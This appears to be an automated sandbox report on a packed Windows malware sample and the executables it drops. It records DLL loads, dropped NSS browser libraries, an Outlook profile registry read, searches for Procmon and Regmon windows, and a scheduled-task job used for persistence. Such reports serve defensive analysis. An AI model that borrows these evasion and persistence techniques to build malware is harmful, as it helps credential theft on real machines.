Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 5239808 > 1048576

Source: file.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x249000
Source: file.exe	Static PE information: Raw size of inxiwgrb is bigger than: 0x100000 < 0x2b2800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W;inxiwgrb:EW;mdkdbixl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;inxiwgrb:EW;mdkdbixl:EW;.taggant:EW;
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Unpacked PE file: 16.2.KJJJKFIIIJ.exe.950000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 17.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 18.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 20.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: skotes.exe.16.dr	Static PE information: real checksum: 0x321a44 should be: 0x312a79
Source: file.exe	Static PE information: real checksum: 0x5006fb should be: 0x5015dd
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x321a44 should be: 0x312a79
Source: 5762ea743c.exe.20.dr	Static PE information: real checksum: 0x1c9748 should be: 0x1cf875
Source: random[1].exe.20.dr	Static PE information: real checksum: 0x1c9748 should be: 0x1cf875
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: real checksum: 0x321a44 should be: 0x312a79

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: inxiwgrb
Source: file.exe	Static PE information: section name: mdkdbixl
Source: file.exe	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: urdywiyw
Source: random[1].exe.0.dr	Static PE information: section name: pwtoxbng
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name:
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: .idata
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: urdywiyw
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: pwtoxbng
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.16.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name: .idata
Source: skotes.exe.16.dr	Static PE information: section name: urdywiyw
Source: skotes.exe.16.dr	Static PE information: section name: pwtoxbng
Source: skotes.exe.16.dr	Static PE information: section name: .taggant
Source: random[1].exe.20.dr	Static PE information: section name:
Source: random[1].exe.20.dr	Static PE information: section name: .idata
Source: random[1].exe.20.dr	Static PE information: section name:
Source: random[1].exe.20.dr	Static PE information: section name: kgsecyxg
Source: random[1].exe.20.dr	Static PE information: section name: wijvifly
Source: random[1].exe.20.dr	Static PE information: section name: .taggant
Source: 5762ea743c.exe.20.dr	Static PE information: section name:
Source: 5762ea743c.exe.20.dr	Static PE information: section name: .idata
Source: 5762ea743c.exe.20.dr	Static PE information: section name:
Source: 5762ea743c.exe.20.dr	Static PE information: section name: kgsecyxg
Source: 5762ea743c.exe.20.dr	Static PE information: section name: wijvifly
Source: 5762ea743c.exe.20.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_0096D91C push ecx; ret	16_2_0096D92F
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00961359 push es; ret	16_2_0096135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A2D91C push ecx; ret	17_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A2D91C push ecx; ret	18_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A2D91C push ecx; ret	20_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A2DFC6 push ecx; ret	20_2_00A2DFD9

Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.008684570285353
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: entropy: 7.008684570285353
Source: skotes.exe.16.dr	Static PE information: section name: entropy: 7.008684570285353
Source: random[1].exe.20.dr	Static PE information: section name: entropy: 7.9861736728364
Source: random[1].exe.20.dr	Static PE information: section name: kgsecyxg entropy: 7.954010447908177
Source: 5762ea743c.exe.20.dr	Static PE information: section name: entropy: 7.9861736728364
Source: 5762ea743c.exe.20.dr	Static PE information: section name: kgsecyxg entropy: 7.954010447908177

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\KJJJKFIIIJ.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\KJJJKFIIIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
